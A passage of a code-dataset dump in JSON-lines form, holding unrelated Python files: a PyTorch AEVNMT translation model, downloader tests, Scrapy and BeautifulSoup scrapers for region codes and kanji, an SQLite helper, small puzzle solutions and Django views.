self.lm_init_layer.parameters())\n\n def tm_parameters(self):\n params = chain(self.encoder.parameters(),\n self.decoder.parameters(),\n self.tgt_embedder.parameters(),\n self.encoder_init_layer.parameters(),\n self.decoder_init_layer.parameters())\n if not self.tied_embeddings:\n # wrap the Parameter in a list so chain yields the tensor itself, not its rows\n params = chain(params, [self.output_matrix])\n return params\n\n def approximate_posterior(self, x, seq_mask_x, seq_len_x):\n \"\"\"\n Returns an approximate posterior distribution q(z|x).\n \"\"\"\n return self.inf_network(x, seq_mask_x, seq_len_x)\n\n def prior(self):\n return torch.distributions.Normal(loc=self.prior_loc,\n scale=self.prior_scale)\n\n def src_embed(self, x):\n\n # We share the source embeddings with the language_model.\n x_embed = self.language_model.embedder(x)\n x_embed = self.dropout_layer(x_embed)\n return x_embed\n\n def tgt_embed(self, y):\n y_embed = self.tgt_embedder(y)\n y_embed = self.dropout_layer(y_embed)\n return y_embed\n\n def encode(self, x, seq_len_x, z):\n x_embed = self.src_embed(x)\n hidden = tile_rnn_hidden(self.encoder_init_layer(z), self.encoder.rnn)\n return self.encoder(x_embed, seq_len_x, hidden=hidden)\n\n def init_decoder(self, encoder_outputs, encoder_final, z):\n self.decoder.init_decoder(encoder_outputs, encoder_final)\n hidden = tile_rnn_hidden_for_decoder(self.decoder_init_layer(z), self.decoder)\n return 
hidden\n\n def generate(self, pre_output):\n W = self.tgt_embedder.weight if self.tied_embeddings else self.output_matrix\n return F.linear(pre_output, W)\n\n def run_language_model(self, x, z):\n \"\"\"\n Runs the language_model.\n\n :param x: unembedded source sentence\n :param z: a sample of the latent variable\n \"\"\"\n hidden = tile_rnn_hidden(self.lm_init_layer(z), self.language_model.rnn)\n return self.language_model(x, hidden=hidden)\n\n def forward(self, x, seq_mask_x, seq_len_x, y, z):\n\n # Encode the source sentence and initialize the decoder hidden state.\n encoder_outputs, encoder_final = self.encode(x, seq_len_x, z)\n hidden = self.init_decoder(encoder_outputs, encoder_final, z)\n\n # Estimate the Categorical parameters for E[P(x|z)] using the given sample of the latent\n # variable.\n lm_logits = self.run_language_model(x, z)\n\n # Estimate the Categorical parameters for E[P(y|x, z)] using the given sample of the latent\n # variable.\n tm_logits = []\n all_att_weights = []\n max_time = y.size(1)\n for t in range(max_time):\n prev_y = y[:, t]\n y_embed = self.tgt_embed(prev_y)\n pre_output, hidden, att_weights = self.decoder.step(y_embed, hidden, seq_mask_x,\n encoder_outputs)\n logits = self.generate(pre_output)\n tm_logits.append(logits)\n all_att_weights.append(att_weights)\n\n return torch.cat(tm_logits, dim=1), lm_logits, torch.cat(all_att_weights, dim=1)\n\n def compute_conditionals(self, x_in, seq_mask_x, seq_len_x, x_out, y_in, y_out, z):\n \"\"\"\n :param x_in: [batch_size, max_length]\n :param seq_mask_x: [batch_size, max_length]\n :param seq_len_x: [batch_size]\n :param x_out: [batch_size, max_length]\n :param y_in: [batch_size, max_length]\n :param y_out: [batch_size, max_length]\n :param z: [batch_size, latent_size]\n :return: log p(x|z), log p(y|z,x)\n \"\"\"\n # Encode the source sentence and initialize the decoder hidden state.\n encoder_outputs, encoder_final = self.encode(x_in, seq_len_x, z)\n hidden = self.init_decoder(encoder_outputs, encoder_final, z)\n\n # Estimate the Categorical parameters for E[P(x|z)] using the given sample of the latent\n # variable.\n # [max_length, batch_size, vocab_size]\n lm_logits = self.run_language_model(x_in, z)\n\n # Estimate the Categorical parameters for E[P(y|x, z)] using the given sample of the latent\n # variable.\n tm_logits = []\n max_time = y_in.size(1)\n for t in range(max_time):\n prev_y = y_in[:, t]\n y_embed = self.tgt_embed(prev_y)\n pre_output, hidden, _ = self.decoder.step(y_embed, hidden, seq_mask_x,\n encoder_outputs)\n logits = self.generate(pre_output)\n tm_logits.append(logits)\n # [batch_size, max_length, vocab_size]\n tm_logits = torch.cat(tm_logits, dim=1)\n\n # [batch_size, vocab_size, max_length]\n lm_logits = lm_logits.permute(0, 2, 1)\n tm_logits = tm_logits.permute(0, 2, 1)\n\n # [batch_size]\n tm_loss = F.cross_entropy(tm_logits, y_out, ignore_index=self.pad_idx, reduction=\"none\").sum(dim=1)\n lm_loss = F.cross_entropy(lm_logits, x_out, ignore_index=self.pad_idx, reduction=\"none\").sum(dim=1)\n\n return -lm_loss, -tm_loss\n\n def compute_lm_likelihood(self, x_in, seq_mask_x, seq_len_x, x_out, z):\n \"\"\"\n :param x_in: [batch_size, max_length]\n :param seq_mask_x: [batch_size, max_length]\n :param seq_len_x: [batch_size]\n :param x_out: [batch_size, max_length]\n :param z: [batch_size, latent_size]\n :return: log p(x|z)\n \"\"\"\n # Encode the source sentence and initialize the decoder hidden 
state.\n encoder_outputs, encoder_final = self.encode(x_in, seq_len_x, z)\n hidden = self.init_decoder(encoder_outputs, encoder_final, z)\n\n # Estimate the Categorical parameters for E[P(x|z)] using the given sample of the latent\n # variable.\n # [max_length, batch_size, vocab_size]\n lm_logits = self.run_language_model(x_in, z)\n # [batch_size, vocab_size, max_length]\n lm_logits = lm_logits.permute(0, 2, 1)\n\n lm_loss = F.cross_entropy(lm_logits, x_out, ignore_index=self.pad_idx, reduction=\"none\").sum(dim=1)\n\n return -lm_loss\n\n def compute_tm_likelihood(self, x_in, seq_mask_x, seq_len_x, y_in, y_out, z):\n \"\"\"\n :param x_in: [batch_size, max_length]\n :param seq_mask_x: [batch_size, max_length]\n :param seq_len_x: [batch_size]\n :param y_in: [batch_size, max_length]\n :param y_out: [batch_size, max_length]\n :param z: [batch_size, latent_size]\n :return: log p(y|z,x)\n \"\"\"\n # Encode the source sentence and initialize the decoder hidden state.\n encoder_outputs, encoder_final = self.encode(x_in, seq_len_x, z)\n hidden = self.init_decoder(encoder_outputs, encoder_final, z)\n\n # Estimate the Categorical parameters for E[P(y|x, z)] using the given sample of the latent\n # variable.\n tm_logits = []\n max_time = y_in.size(1)\n for t in range(max_time):\n prev_y = y_in[:, t]\n y_embed = self.tgt_embed(prev_y)\n pre_output, hidden, _ = self.decoder.step(y_embed, hidden, seq_mask_x,\n encoder_outputs)\n logits = self.generate(pre_output)\n tm_logits.append(logits)\n # [batch_size, max_length, vocab_size]\n tm_logits = torch.cat(tm_logits, dim=1)\n\n # [batch_size, vocab_size, max_length]\n tm_logits = tm_logits.permute(0, 2, 1)\n\n # [batch_size]\n tm_loss = F.cross_entropy(tm_logits, y_out, ignore_index=self.pad_idx, reduction=\"none\").sum(dim=1)\n\n return -tm_loss\n\n def loss(self, tm_logits, lm_logits, targets_y, targets_x, qz, free_nats=0.,\n KL_weight=1., reduction=\"mean\"):\n \"\"\"\n Computes an estimate of the negative evidence lower bound for the single sample of the latent\n variable that was used to compute the categorical parameters, and the distributions qz\n that the sample comes from.\n\n :param tm_logits: translation model logits, the unnormalized translation probabilities [B, T_y, vocab_size]\n :param lm_logits: language model logits, the unnormalized language probabilities [B, T_x, vocab_size]\n :param targets_y: target labels of the target sentence [B, T_y]\n :param targets_x: target labels of the source sentence [B, T_x]\n :param qz: distribution that was used to sample the latent variable.\n :param free_nats: KL = max(KL, free_nats)\n :param KL_weight: weight to multiply the KL with, applied after free_nats\n :param reduction: what reduction to apply, none ([B]), mean ([]) or sum ([])\n \"\"\"\n\n # Compute the loss for each batch element. 
Logits are of the form [B, T, vocab_size],\n # whereas the cross-entropy function wants a loss of the form [B, vocab_size, T].\n tm_logits = tm_logits.permute(0, 2, 1)\n tm_loss = F.cross_entropy(tm_logits, targets_y, ignore_index=self.pad_idx, reduction=\"none\")\n tm_loss = tm_loss.sum(dim=1)\n\n # Compute the language model categorical loss.\n lm_loss = self.language_model.loss(lm_logits, targets_x, reduction=\"none\")\n\n # Compute the KL divergence between the distribution used to sample z, and the prior\n # distribution.\n pz = self.prior().expand(qz.mean.size())\n\n # The loss is the negative ELBO.\n tm_log_likelihood = -tm_loss\n lm_log_likelihood = -lm_loss\n\n KL = torch.distributions.kl.kl_divergence(qz, pz)\n raw_KL = KL.sum(dim=1)\n KL = KL.sum(dim=1)\n\n if free_nats > 0:\n KL = torch.clamp(KL, min=free_nats)\n KL *= KL_weight\n elbo = tm_log_likelihood + lm_log_likelihood - KL\n loss = -elbo\n\n out_dict = {\n 'tm_log_likelihood': tm_log_likelihood,\n 'lm_log_likelihood': lm_log_likelihood,\n 'KL': KL,\n 'raw_KL': raw_KL\n }\n\n # Return differently according to the reduction setting.\n if reduction == \"mean\":\n out_dict['loss'] = loss.mean()\n elif reduction == \"sum\":\n out_dict['loss'] = loss.sum()\n elif reduction == \"none\":\n out_dict['loss'] = loss\n else:\n raise Exception(f\"Unknown reduction option {reduction}\")\n\n return out_dict\n","sub_path":"aevnmt/models/aevnmt.py","file_name":"aevnmt.py","file_ext":"py","file_size_in_byte":14922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"439493178","text":"# -*- coding: UTF-8 -*-\n\"\"\"Downloader Tests\"\"\"\nimport tempfile\nfrom os import unlink\nfrom os.path import join, abspath\n\nimport pytest\n\nfrom hdx.utilities.downloader import Download, DownloadError\nfrom hdx.utilities.path import script_dir\n\n\nclass TestDownloader:\n    @pytest.fixture\n    def fixtureurl(self):\n        return 'https://raw.githubusercontent.com/OCHA-DAP/hdx-python-api/master/tests/fixtures/test_data.csv'\n\n    @pytest.fixture\n    def fixturenotexistsurl(self):\n        return 'https://raw.githubusercontent.com/OCHA-DAP/hdx-python-api/master/tests/fixtures/NOTEXIST.csv'\n\n    def test_get_path_for_url(self, fixtureurl):\n        scriptdir = script_dir(TestDownloader)\n        path = Download.get_path_for_url(fixtureurl, scriptdir)\n        assert abspath(path) == abspath(join(scriptdir, 'test_data.csv'))\n        downloader_folder = join(scriptdir, '..', '..', 'fixtures', 'downloader')\n        path = Download.get_path_for_url(fixtureurl, downloader_folder)\n        assert abspath(path) == abspath(join(downloader_folder, 'test_data3.csv'))\n\n    def test_setup_stream(self, fixtureurl, fixturenotexistsurl):\n        with pytest.raises(DownloadError), Download() as download:\n            download.setup_stream('NOTEXIST://NOTEXIST.csv')\n        with pytest.raises(DownloadError), Download() as download:\n            download.setup_stream(fixturenotexistsurl)\n        with Download() as download:\n            download.setup_stream(fixtureurl)\n            headers = download.response.headers\n            assert headers['Content-Length'] == '728'\n\n    def test_hash_stream(self, fixtureurl):\n        with Download() as download:\n            download.setup_stream(fixtureurl)\n            md5hash = download.hash_stream(fixtureurl)\n            assert md5hash == 'da9db35a396cca10c618f6795bdb9ff2'\n\n    def test_download_file(self, fixtureurl, fixturenotexistsurl):\n        tmpdir = tempfile.gettempdir()\n        with pytest.raises(DownloadError), Download() as download:\n            download.download_file('NOTEXIST://NOTEXIST.csv', tmpdir)\n        with pytest.raises(DownloadError), Download() 
as download:\n download.download_file(fixturenotexistsurl)\n with Download() as download:\n f = download.download_file(fixtureurl, tmpdir)\n fpath = abspath(f)\n unlink(f)\n assert fpath == abspath(join(tmpdir, 'test_data.csv'))\n\n def test_download(self, fixtureurl, fixturenotexistsurl):\n with pytest.raises(DownloadError), Download() as download:\n download.download('NOTEXIST://NOTEXIST.csv')\n with pytest.raises(DownloadError), Download() as download:\n download.download(fixturenotexistsurl)\n with Download() as download:\n result = download.download(fixtureurl)\n assert result.headers['Content-Length'] == '728'\n","sub_path":"tests/hdx/utilities/test_downloader.py","file_name":"test_downloader.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"10067411","text":"import set\nimport sys\n\n\ndef input_filename():\n \"\"\"\n Function to prompt the user for the filename and handle the input\n \"\"\"\n filename = input(\"Please enter the filename (Eg: input1.txt): \")\n if not filename.endswith(\".txt\"):\n print(\"\\nPlease check the filename given. It needs to be a txt file.\")\n return filename\n\n\ndef read_from_file(filename):\n \"\"\"\n Function to read the lines from the input file and create a new Card object for each line read\n :rtype: List of Card objects\n \"\"\"\n card_list = []\n try:\n with open(filename, \"r\") as file:\n for card_string in file:\n cards = set.create_cards(card_string)\n if cards is not None:\n card_list.append(cards)\n return card_list\n except Exception as e:\n sys.exit(f\"\\nFailed to open file: {e}\")\n","sub_path":"input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"414732162","text":"import scrapy\nfrom RegionCode.items import RegioncodeItem\nfrom bs4 import BeautifulSoup\n\nclass CodeSpider(scrapy.Spider):\n\tname = 'RegionCode'\n\tallowed_domains = [\"stats.gov.cn\"]\n\tstart_urls = [\"http://www.stats.gov.cn/tjsj/tjbz/tjyqhdmhcxhfdm/2016/41.html\",]\n\n\t# def parse(self, response):\n\t# \tprint(response.url)\n\t# \tprovince_tds = response.xpath('//tr[@class=\"provincetr\"]//td')\n\t# \titem = RegioncodeItem()\n\t# \tfor td in province_tds:\n\t# \t\tpro_url_tail = td.xpath('a/@href')[0].extract()\n\t# \t\tpro_name = td.xpath('a/text()')[0].extract()\n\t# \t\titem['code'] = pro_url_tail[:-5]\n\t# \t\titem['name'] = pro_name\n\t# \t\tyield item\n\n\n\t# \t\tpro_url = 'http://www.stats.gov.cn/tjsj/tjbz/tjyqhdmhcxhfdm/2016/' + pro_url_tail\n\t# \t\tyield scrapy.Request(url=pro_url, callback=self.parse_province, dont_filter=True)\n\n\tdef parse(self, response):\n\t\tprint(response.url)\n\t\tdata = response.body\n\t\tsoup = BeautifulSoup(data, 'lxml')\n\t\tcitytrs = soup.find_all('tr', attrs={'class':'citytr'})\n\t\titem = RegioncodeItem()\n\t\tfor ctr in citytrs:\n\t\t\tcitytds = ctr.find_all('td')\n\t\t\tcity_url_tail = citytds[0].find('a')['href']\n\t\t\tcity_name = citytds[1].getText()\n\t\t\tcity_code = citytds[0].getText()\n\t\t\titem['code'] = city_code\n\t\t\titem['name'] = city_name\n\t\t\tyield item\n\n\t\t\tcity_url = 'http://www.stats.gov.cn/tjsj/tjbz/tjyqhdmhcxhfdm/2016/' + city_url_tail\n\t\t\tyield scrapy.Request(city_url, callback=self.parse_city)\n\n\tdef parse_city(self, response):\n\t\tprint(response.url)\n\t\titem = RegioncodeItem()\n\t\tdata = response.body\n\t\tsoup = BeautifulSoup(data, 'lxml')\n\t\tcountytrs = 
soup.find_all('tr', attrs={'class':'countytr'})\n\t\tfor countytr in countytrs:\n\t\t\tlink = countytr.find_all('a')\n\t\t\tif len(link) == 0:\n\t\t\t\ttds = countytr.find_all('td')\n\t\t\t\tcounty_code = tds[0].getText()\n\t\t\t\tcounty_name = tds[1].getText()\n\t\t\t\titem['code'] = county_code\n\t\t\t\titem['name'] = county_name\n\t\t\t\tyield item\n\t\t\telse:\n\t\t\t\tcounty_url_tail = link[0]['href']\n\t\t\t\ttds = countytr.find_all('td')\n\t\t\t\tcounty_code = tds[0].getText()\n\t\t\t\tcounty_name = tds[1].getText()\n\t\t\t\titem['code'] = county_code\n\t\t\t\titem['name'] = county_name\n\t\t\t\tyield item\n\n\t\t\t\tcounty_url = response.url[:-9] + county_url_tail\n\t\t\t\tyield scrapy.Request(county_url, callback=self.parse_county)\n\n\tdef parse_county(self, response):\n\t\tprint(response.url)\n\t\titem = RegioncodeItem()\n\t\tdata = response.body\n\t\tsoup = BeautifulSoup(data, 'lxml')\n\t\ttowntrs = soup.find_all('tr', attrs={'class':'towntr'})\n\t\tfor ttr in towntrs:\n\t\t\ttds = ttr.find_all('td')\n\t\t\ttown_code = tds[0].getText()\n\t\t\ttown_name = tds[1].getText()\n\t\t\tlink = ttr.find_all('a')[0]['href']\n\t\t\titem['code'] = town_code\n\t\t\titem['name'] = town_name\n\t\t\tyield item\n\n\t\t\ttown_url = response.url[:-11] + link\n\t\t\tyield scrapy.Request(town_url, callback=self.parse_town)\n\n\tdef parse_town(self, response):\n\t\tprint(response.url)\n\t\titem = RegioncodeItem()\n\t\tdata = response.body\n\t\tsoup = BeautifulSoup(data, 'lxml')\n\t\tnctrs = soup.find_all('tr', attrs={'class':'villagetr'})\n\t\tfor nctr in nctrs:\n\t\t\ttds = nctr.find_all('td')\n\t\t\tnc_code = tds[0].getText()\n\t\t\tnc_name = tds[2].getText()\n\t\t\titem['code'] = nc_code\n\t\t\titem['name'] = nc_name\n\t\t\tyield item\n","sub_path":"space_history/python_space/history/房屋数据/Python-Spider-github-1108/spider_stat/RegionCode_scrapy/spiders/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"201971143","text":"numbers = list(map(int, input().split(' ')))\nnumbers.sort()\n\nfirstDiff = numbers[1] - numbers[0]\nsecondDiff = numbers[2] - numbers[1]\n\nif firstDiff == secondDiff : \n print(numbers[2] + firstDiff)\nelif secondDiff < firstDiff :\n print(numbers[0] + secondDiff)\nelse :\n print(numbers[1] + firstDiff)\n#### nice: 2\n#### really clean: 2\n\n","sub_path":"Week1/Day6/lye_2997.py","file_name":"lye_2997.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"19955243","text":"from collections import deque\nn=int(input())\ngl=[[]for _ in range(n)]\nfor _ in range(n-1):\n    a,b=map(int, input().split())\n    a-=1\n    b-=1\n    gl[a].append(b)\n    gl[b].append(a)\n\nal=list(map(int, input().split()))\nal.sort(reverse=True)\nqa=deque(al)\n\nvisited=[-1]*n\nq=deque()\nq.append(0)\nvisited[0]=qa.popleft()\nwhile q:\n    poped=q.popleft()\n    for v in gl[poped]:\n        if visited[v]!=-1:continue\n        visited[v]=qa.popleft()\n        q.append(v)\n\nprint(sum(al[1:]))\nprint(*visited)","sub_path":"2_kakomon/arc_like/m_solutions2019_d.py","file_name":"m_solutions2019_d.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"500591417","text":"# -*- coding: utf-8 -*-\nimport os, time\nimport sqlite3\nfrom utils.rwlogging import log\n\nclass SqliteDB():\n\tdef __init__(self):\n\t\tself.conn = 
sqlite3.connect(os.path.join(os.path.dirname(__file__), 'sqlite.db').replace('\\\\','/'),\n\t\t\ttimeout=10, check_same_thread=False)\n\t\tself.conn.row_factory = sqlite3.Row\n\t\tself.initTables()\n\tdef emptyTables(self):\n\t\tcur = self.conn.cursor()\n\t\tcur.execute('DELETE FROM XAGUSD1440')\n\t\tself.conn.commit()\n\t\tlog.debug('Emptied')\n\t\t\n\tdef commit(self):\n\t\tself.conn.commit()\n\t\t\n\tdef addData(self, table, data):\n\t\tcur = self.conn.cursor()\n\t\t# int() instead of the Python 2-only long()\n\t\tcur.execute('SELECT DTLONG FROM ' + table + ' WHERE DTLONG=?', (int(data[0]),))\n\t\tif cur.fetchone() is None:\n\t\t\t#log.debug('inserting ' + table + ' : ')\n\t\t\t#log.info(data)\n\t\t\t#cur.execute('INSERT INTO PRICE(DTLONG,DDATE,DTIME,DCLOSE,DHIGH,DLOW,DOPEN,DRMB,DVOL,DINX1,DINX2,DINX3,DINX4,DINX5,DINX6,DNOTES) VALUES(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)', data)\n\t\t\tcur.execute('INSERT INTO ' + table + ' VALUES(?,?,?,?,?,?,?,?,?,?,?)', data)\n\t\telse:\n\t\t\tlog.info('** data duplicate ** ' + table + ' : ')\n\t\t\tlog.info(data)\n\t\tcur.close()\n\t\treturn\n\t\t\n\tdef getAllPrices(self, table):\n\t\tcur = self.conn.cursor()\n\t\tcur.execute('''SELECT \nDTLONG as dtlong, DDATE as date, DTIME as time, DOPEN as open, \nDHIGH as high, DLOW as low, DCLOSE as close, DVOL as vol, \nDRMB as rmb, DCHAN as chan, DPERC as per FROM ''' + table + ' ORDER BY DTLONG')\n\t\treturn cur.fetchall()\n\t\n\tdef createIndicator(self, dtype, itype, subtype, arg1 = 0, arg2 = 0, arg3 = 0, arg4 = 0, arg5 = 0):\n\t\tself.table = dtype + '_' + itype + '_' + subtype + '_' + str(arg1) + '_' + str(arg2) + '_' + str(arg3) + '_' + str(arg4) + '_' + str(arg5)\n\t\tlog.info('create table ' + self.table)\n\t\tcur = self.conn.cursor()\n\t\tcur.execute('''\nCREATE TABLE IF NOT EXISTS ''' + self.table + '''\n(\nDTLONG INTEGER PRIMARY KEY,\nDDATE TEXT,\nDTIME TEXT,\nVAL1 REAL,\nVAL2 REAL,\nVAL3 REAL,\nVAL4 REAL,\nVAL5 REAL,\nVAL6 REAL,\nVAL7 REAL,\nVAL8 REAL\n)\n''')\n\t\tcur.execute('DELETE FROM ' + self.table)\n\t\tself.conn.commit()\n\t\tcur.close()\n\t\treturn self\n\t\t\n\tdef addIndicate(self, dtlong, val1, val2 = 0, val3 = 0, val4 = 0, val5 = 0, val6 = 0, val7 = 0, val8 = 0):\n\t\tcur = self.conn.cursor()\n\t\tcur.execute('SELECT DTLONG FROM ' + self.table + ' WHERE DTLONG=?', (dtlong,))\n\t\tif cur.fetchone() is None:\n\t\t\tdt = time.localtime(dtlong)\n\t\t\tddate = time.strftime('%Y-%m-%d', dt)\n\t\t\tdtime = time.strftime('%H:%M:%S', dt)\n\t\t\t#log.debug('inserting ' + self.table + ' : ' + str(val1))\n\t\t\tcur.execute('INSERT INTO ' + self.table + ' VALUES(?,?,?,?,?,?,?,?,?,?,?)', (dtlong,ddate,dtime,val1,val2,val3,val4,val5,val6,val7,val8))\n\t\telse:\n\t\t\tlog.info('** data duplicate ** ' + self.table + ' : ')\n\t\t\t# log the colliding values ('data' is not defined in this method)\n\t\t\tlog.info((dtlong, val1, val2, val3, val4, val5, val6, val7, val8))\n\t\t#self.conn.commit()\n\t\tcur.close()\n\t\treturn\n\t\t\n\t\t\n\tdef getPrice(self, ptype, qtime):\n\t\tcur = self.conn.cursor()\n\t\t#print cur.execute('select * from FEDATA').fetchall()\n\t\tcur.execute('SELECT DVALUE,DPER,DOPEN,DTIME FROM FEDATA WHERE DTYPE=? AND DTLONG<=? 
ORDER BY DTLONG DESC', (ptype, qtime))\n\t\tval = cur.fetchone()\n\t\tif val:\n\t\t\treturn val\n\t\telse:\n\t\t\treturn None\n\t\t\n\n\tdef initTables(self):\n\t\tcur = self.conn.cursor()\n\t\t# all XAGUSD price tables share one schema; create them in a loop\n\t\tfor period in (1, 5, 15, 30, 60, 240, 1440, 10080, 43200):\n\t\t\tcur.execute('''\nCREATE TABLE IF NOT EXISTS XAGUSD''' + str(period) + '''\n(\nDTLONG INTEGER PRIMARY KEY,\nDDATE TEXT,\nDTIME TEXT,\nDOPEN REAL,\nDHIGH REAL,\nDLOW REAL,\nDCLOSE REAL,\nDVOL REAL,\nDRMB REAL,\nDCHAN REAL,\nDPERC REAL\n)\n''')\n\t\tcur.close()","sub_path":"trader/utils/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":5138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"70460319","text":"import pygame\n\n\nclass Boost(pygame.sprite.Sprite):\n\n    def __init__(self):\n        pygame.sprite.Sprite.__init__(self)\n        self.image = pygame.image.load('Images/boost.png').convert()\n        self.ColorKey = self.image.get_at((0, 0))\n        self.image.set_colorkey(self.ColorKey)\n        self.rect = self.image.get_rect()\n        self.boost_mask = pygame.mask.from_surface(self.image)\n","sub_path":"Boost.py","file_name":"Boost.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"34554600","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis code scrapes readings, meanings and example words for a\r\nfrequency-ordered kanji list from jisho.org\r\n\"\"\"\r\n\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport re\r\n\r\ndef read_ex(reading,kun_or_on,soup):\r\n    '''reading is the list of kun or on readings.\r\n    soup is the BeautifulSoup object of the webpage for the character.\r\n    kun_or_on is 1 for kun and 0 for on if they both exist. 
If only one exists,\r\n then it is 0.'''\r\n dict_defn = {}\r\n count=0\r\n for j in reading:\r\n count=count+1\r\n if (j[0] != '-') & (j[-1] != '-'):\r\n lst_ex = re.findall('【(.*)】', soup.find_all('ul', class_='no-bullet')[kun_or_on].get_text())\r\n for k in lst_ex:\r\n if j in k:\r\n start_ex = '\\n 【' + k + '】\\n '\r\n end_ex = '\\n\\n'\r\n ex = start_ex + '(.*)' + end_ex\r\n defn = re.findall(ex, soup.find_all('ul', class_='no-bullet')[kun_or_on].get_text())[0]\r\n ex2 = '\\n\\n '+'(.*)'+start_ex\r\n read = re.findall(ex2, soup.find_all('ul', class_='no-bullet')[kun_or_on].get_text())[0]\r\n dict_defn[reading[count-1]] = read+' '+defn\r\n break\r\n return dict_defn\r\n\r\nfile = open(r\"kanji_by_frequency.txt\",encoding='utf8',mode='r').read()\r\nkanji_by_freq = file.split('\\n')\r\nlist_couple = [list(x.split(': ')) for x in kanji_by_freq]\r\nlist_couple.pop(2501) # The last element is an empty string so pop it\r\n# Convert the number kanji pair to tuples in a list. The number means usage rank in newspapers\r\ntuple_couple = [(int(y[0]),y[1]) for y in list_couple]\r\nkanji_freq = dict(tuple_couple) # Create a dictionary from the tuple pairs\r\nfinal_dict = {}\r\n# Scrape the information off of jisho.org\r\nfor i in range(1,len(kanji_freq)+1):\r\n result = requests.get('https://jisho.org/search/' + kanji_freq[i] + '%23kanji')\r\n c = result.content\r\n soup = BeautifulSoup(c)\r\n # Defines the main meaning of the kanji\r\n main_meaning = soup.find('div',class_=\"kanji-details__main-meanings\").get_text()[7:-5]\r\n if len(soup.find_all('dd', class_=\"kanji-details__main-readings-list\")) == 2:\r\n # Splits readings and defines as a list\r\n kun_reading = soup.find_all('dd', class_=\"kanji-details__main-readings-list\")[0].get_text()[1:-1].split('、 ')\r\n on_reading = soup.find_all('dd', class_=\"kanji-details__main-readings-list\")[1].get_text()[1:-1].split('、 ')\r\n if len(soup.find_all('ul', class_='no-bullet'))==2:\r\n kun_reading_ex = read_ex(kun_reading,1,soup)\r\n on_reading_ex = read_ex(on_reading,0,soup)\r\n elif len(soup.find_all('ul', class_='no-bullet'))==1:\r\n if soup.find_all('h2')[0:2] == 'On':\r\n on_reading_ex = read_ex(on_reading,0,soup)\r\n kun_reading_ex = []\r\n else:\r\n kun_reading_ex = read_ex(kun_reading,0,soup)\r\n on_reading_ex=[]\r\n else:\r\n kun_reading_ex = []\r\n on_reading_ex = []\r\n elif soup.find_all('dt')[2].get_text()=='Kun:':\r\n kun_reading = soup.find_all('dd', class_=\"kanji-details__main-readings-list\")[0].get_text()[1:-1].split('、 ')\r\n if len(soup.find_all('ul', class_='no-bullet'))==1:\r\n kun_reading_ex = read_ex(kun_reading,0,soup)\r\n on_reading_ex=[]\r\n else:\r\n kun_reading_ex = []\r\n on_reading_ex = []\r\n elif soup.find_all('dt')[2].get_text()=='On:':\r\n on_reading = soup.find_all('dd', class_=\"kanji-details__main-readings-list\")[0].get_text()[1:-1].split('、 ')\r\n if len(soup.find_all('ul', class_='no-bullet'))==1:\r\n on_reading_ex = read_ex(on_reading,0,soup)\r\n kun_reading_ex = []\r\n else:\r\n kun_reading_ex = []\r\n on_reading_ex = []\r\n final_dict[i] =[main_meaning,kun_reading,kun_reading_ex,on_reading,on_reading_ex]\r\n# The final dictionary was saved as a pickle object\r\nkanji_info = final_dict\r\n","sub_path":"top_kanji.py","file_name":"top_kanji.py","file_ext":"py","file_size_in_byte":3985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"601381299","text":"# -*- coding: utf-8 -*-\n\"\"\"\nShowtitle - Links\n\"\"\"\nserieslinks = {'The Big Bang Theory' : 
'the-big-bang-theory',\n 'The-Simpsons' : 'die-simpsons',\n 'Marvel-s-Agents-of-S-H-I-E-L-D':'the-agents-of-s-h-i-e-l-d',\n 'Fringe':'fringe-grenzfaelle-des-fbi',\n\t\t\t 'The-Vampire-Diaries':'Vampire-Diaries'} \n #to be continued...\n\nsenderlist = {'pro7' : 'ProSieben', 'rtlnitro' : 'rtl-nitro',\n 'pro7max' : 'ProSiebenMaxx', 'rtl':'rtl', 'vox':'vox',\n 'rtl2':'rtl2'}\n","sub_path":"fernsehserien_de_links.py","file_name":"fernsehserien_de_links.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"6120222","text":"#coding: utf-8\nfrom django.shortcuts import render, render_to_response\nfrom dbcontrol import DBcontrolLer\nfrom django.http import JsonResponse, HttpResponse\nimport json\n# Create your views here.\ndef index(request):\n controller = DBcontrolLer()\n orderList = controller.getShopList()\n return render(request,'index.html')\n\ndef getOrderList(request):\n # controller = DBcontrolLer()\n # orderList = controller.getOrderList()\n orderList = [{\"username\":\"Li\"},{\"username\":\"Chen\"}]\n if len(orderList) > 0:\n return render_to_response('orderList.html', {\"orderList\":orderList})\n else:\n # a view must return an HttpResponse, not a bare string\n return HttpResponse('')\n\ndef getShopInfo(request):\n #shopInfo = [{\"shopname\":\"shop1\",\"discount\":\"discount\",\"baseprice\":\"baseprice\",\"dishes\":[{\"dishname\":\"dish1\",\"price\":\"price1\"},{\"dishname\":\"dish2\",\"price\":\"price2\"}]}]\n controller = DBcontrolLer()\n shopInfo = controller.getShopList()\n if len(shopInfo)>0:\n return render_to_response('shopList_module.html',{\"shopInfo\":shopInfo})\n else:\n return HttpResponse('')\n\ndef submitOrder(request):\n order = json.loads(request.body)\n controller = DBcontrolLer()\n controller.submitOrder(order['orders'])\n #print order['orders'][0]['username']\n return JsonResponse({'1':1})\n\ndef login(request):\n if request.POST:\n others = 